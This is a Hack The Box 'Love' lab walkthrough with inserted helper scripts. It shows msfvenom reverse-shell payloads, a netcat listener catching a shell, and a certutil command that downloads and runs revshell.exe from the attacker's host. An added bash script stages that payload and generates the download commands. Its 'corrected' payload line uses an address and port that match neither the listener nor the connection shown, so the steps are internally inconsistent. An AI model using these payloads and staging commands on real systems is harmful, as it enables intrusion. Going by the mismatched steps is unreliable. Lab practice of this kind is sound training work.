LOVE_HTB
Machine
Scan
- Command
sudo nmap -Pn -sV -T4 10.10.10.239
- Result
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -sV -T4 10.10.10.239
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-28 07:11 EST
Nmap scan report for 10.10.10.239
Host is up (0.33s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=11/28%Time=6565D8DC%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLine
SF:s,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,4A,"F\0\0\x01\
SF:xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\xffj
SF:\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessionReq,4A,"F\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conn
SF:ect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x
SF:20this\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(SIPOptions,4A,"F\0\0\x01\xffj\x04Host\x20'1
SF:0\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x
SF:20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.34 seconds
Initial Access
- Host preparation
echo "10.10.10.239 www.love.htb staging.love.htb" | sudo tee -a /etc/hosts
(The form sudo echo "..." > /etc/hosts does not work: the redirection is performed by the unprivileged shell, not by sudo, and ">" would overwrite the whole file instead of appending to it.)
- Web access (www.love.htb)
- Web access (staging.love.htb)
- Web access (staging.love.htb/beta.php)
- Web access (www.love.htb/admin)
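The host preparation step done safely, as an added example that is not part of the original write-up: the entry is appended only if it is missing, and the helper refuses to shadow a name that is already mapped to a different address (a stale lab entry is a common reason a vhost "randomly" points at the wrong box). The address and the two vhost names come from the scan above; the function names, the writable-file shortcut used for testing, and the temp-file demo are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not part of the original write-up): add the HTB host names
# to /etc/hosts safely. The write-up's "sudo echo ... > /etc/hosts" fails
# because the redirection runs in the unprivileged shell, and ">" would
# replace the whole file instead of appending to it.
set -eu

# lookup_host FILE NAME: print the address FILE currently maps NAME to
# (first match, comments ignored), or nothing if NAME is absent.
lookup_host() {
    awk -v n="$2" '
        { sub(/#.*/, "") }
        NF >= 2 { for (i = 2; i <= NF; i++) if ($i == n) { print $1; exit } }
    ' "$1"
}

# add_hosts_entry FILE IP NAME...: append "IP NAME..." unless every NAME is
# already mapped to IP. Returns 1 (and writes nothing) if a NAME is bound to
# a different address, so an existing entry is never silently shadowed.
# Writes directly when FILE is writable (e.g. a test file), otherwise via
# "sudo tee -a" as /etc/hosts requires.
add_hosts_entry() {
    local file="$1" ip="$2" name cur missing=0
    shift 2
    for name in "$@"; do
        cur=$(lookup_host "$file" "$name")
        if [ -n "$cur" ] && [ "$cur" != "$ip" ]; then
            echo "refusing: $name already maps to $cur in $file" >&2
            return 1
        fi
        if [ -z "$cur" ]; then missing=1; fi
    done
    if [ "$missing" -eq 1 ]; then
        if [ -w "$file" ]; then
            printf '%s %s\n' "$ip" "$*" >>"$file"
        else
            printf '%s %s\n' "$ip" "$*" | sudo tee -a "$file" >/dev/null
        fi
    fi
    return 0
}

# Usage for this box (address and vhosts from the nmap Service Info line):
#   add_hosts_entry /etc/hosts 10.10.10.239 www.love.htb staging.love.htb

# Demo on a constructed hosts file (run with --demo) so nothing touches /etc/hosts.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    printf '127.0.0.1 localhost\n' >"$tmp"
    add_hosts_entry "$tmp" 10.10.10.239 www.love.htb staging.love.htb
    add_hosts_entry "$tmp" 10.10.10.239 www.love.htb staging.love.htb   # no duplicate
    cat "$tmp"
    rm -f "$tmp"
fi
```

Running the same call twice leaves a single line, and calling it with a different address for an already-mapped name fails loudly instead of producing two conflicting entries.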
Make Shell
- Ready
- Make reverse.php
msfvenom -p php/reverse_php LHOST=<ip address> LPORT=<your port> -f raw > phpreverseshell.php
- Result
┌──(kali㉿kali)-[~/love]
└─$ msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=135 -f raw > phpreverseshell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3027 bytes
- Result
- Upload reverse.php
Corrected as follows (a native Windows executable payload instead of the PHP one; LHOST and LPORT must match the address and port of the listener actually running, otherwise the connection never arrives):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.54 LPORT=445 -f exe > revshell.exe
┌──(kali㉿kali)-[~/love]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.239] 54044
whoami
love\phoebe
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs\images
11/28/2023 06:53 AM <DIR> .
11/28/2023 06:53 AM <DIR> ..
05/18/2018 07:10 AM 4,240 facebook-profile-image.jpeg
04/12/2021 02:53 PM 0 index.html.txt
01/26/2021 11:08 PM 844 index.jpeg
11/28/2023 06:53 AM 3,038 phpreverseshell.php
08/24/2017 03:00 AM 26,644 profile.jpg
11/28/2023 06:49 AM 7,168 revshell.exe
6 File(s) 41,934 bytes
2 Dir(s) 3,905,249,280 bytes free
certutil.exe -urlcache -split -f http://10.10.16.10/revshell.exe revshell.exe
**** Online ****
CertUtil: -URLCache command FAILED: 0x80072efd (WinHttp: 12029 ERROR_WINHTTP_CANNOT_CONNECT)
CertUtil: A connection with the server could not be established
certutil.exe -urlcache -split -f http://10.10.16.10:8080/revshell.exe revshell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\xampp\htdocs\omrs\images
11/28/2023 06:53 AM <DIR> .
11/28/2023 06:53 AM <DIR> ..
05/18/2018 07:10 AM 4,240 facebook-profile-image.jpeg
04/12/2021 02:53 PM 0 index.html.txt
01/26/2021 11:08 PM 844 index.jpeg
11/28/2023 06:53 AM 3,038 phpreverseshell.php
08/24/2017 03:00 AM 26,644 profile.jpg
11/28/2023 06:55 AM 7,168 revshell.exe
6 File(s) 41,934 bytes
2 Dir(s) 3,905,241,088 bytes free
.\revshell.exe
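Staging the executable for the certutil transfer and checking the copy that lands on the target, as an added example that is not part of the original write-up. In the transcript the first certutil fetch failed because nothing answered on port 80 of the attack box, the second succeeded on :8080, and the only integrity check was the byte count in dir. The helpers below record the SHA256 of the staged file, print the exact download and hash commands for the target shell, and verify the output of certutil -hashfile pasted back from that shell. The attack-box address 10.10.16.10 and port 8080 are taken from the transcript; serving the directory with python3 -m http.server, the function names, and the constructed dummy payload are assumptions (the write-up does not say what served :8080).

```bash
#!/usr/bin/env bash
# Added example (not part of the original write-up): stage a payload for the
# certutil transfer and verify the copy on the target by SHA256 rather than
# by the byte count shown in "dir".
set -eu

# sha256_of FILE: hex digest via sha256sum (coreutils) or shasum (macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# stage_payload SRC DIR: copy SRC into the directory you will serve to the
# target (assumed: "python3 -m http.server 8080" run inside DIR) and print
# the digest to compare against later.
stage_payload() {
    mkdir -p "$2"
    cp "$1" "$2/$(basename "$1")"
    sha256_of "$2/$(basename "$1")"
}

# certutil_fetch_cmd LHOST PORT FILE: the download line for the target shell,
# with the port made explicit so it cannot silently default to :80.
certutil_fetch_cmd() {
    printf 'certutil.exe -urlcache -split -f http://%s:%s/%s %s\n' "$1" "$2" "$3" "$3"
}

# hashfile_cmd FILE: asks the target to print the dropped file's SHA256.
hashfile_cmd() {
    printf 'certutil.exe -hashfile %s SHA256\n' "$1"
}

# verify_hashfile_output EXPECTED_HEX: read "certutil -hashfile" output on
# stdin and return 0 only if it contains the expected digest. Older certutil
# builds print the hex with a space between bytes and use CRLF line ends, so
# spaces and CRs are stripped and case is ignored before comparing.
verify_hashfile_output() {
    local want got
    want=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    got=$(tr -d ' \r' | tr 'A-F' 'a-f' | grep -E '^[0-9a-f]{64}$' | head -n 1 || true)
    [ -n "$got" ] && [ "$got" = "$want" ]
}

# Demo with constructed data (run with --demo): a dummy file stands in for
# revshell.exe; the address and port are the ones seen in the transcript.
if [ "${1:-}" = "--demo" ]; then
    work=$(mktemp -d)
    printf 'MZ-not-really-a-pe\n' >"$work/revshell.exe"
    digest=$(stage_payload "$work/revshell.exe" "$work/www")
    echo "# on the attack box, inside $work/www:  python3 -m http.server 8080"
    echo "# on the target:"
    certutil_fetch_cmd 10.10.16.10 8080 revshell.exe
    hashfile_cmd revshell.exe
    echo "# expected digest: $digest"
    rm -rf "$work"
fi
```

Paste the target's certutil -hashfile output into verify_hashfile_output before executing the binary; a truncated or partially cached download (certutil -split writes what it received) then fails the check instead of producing a silent non-working shell.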
Discussion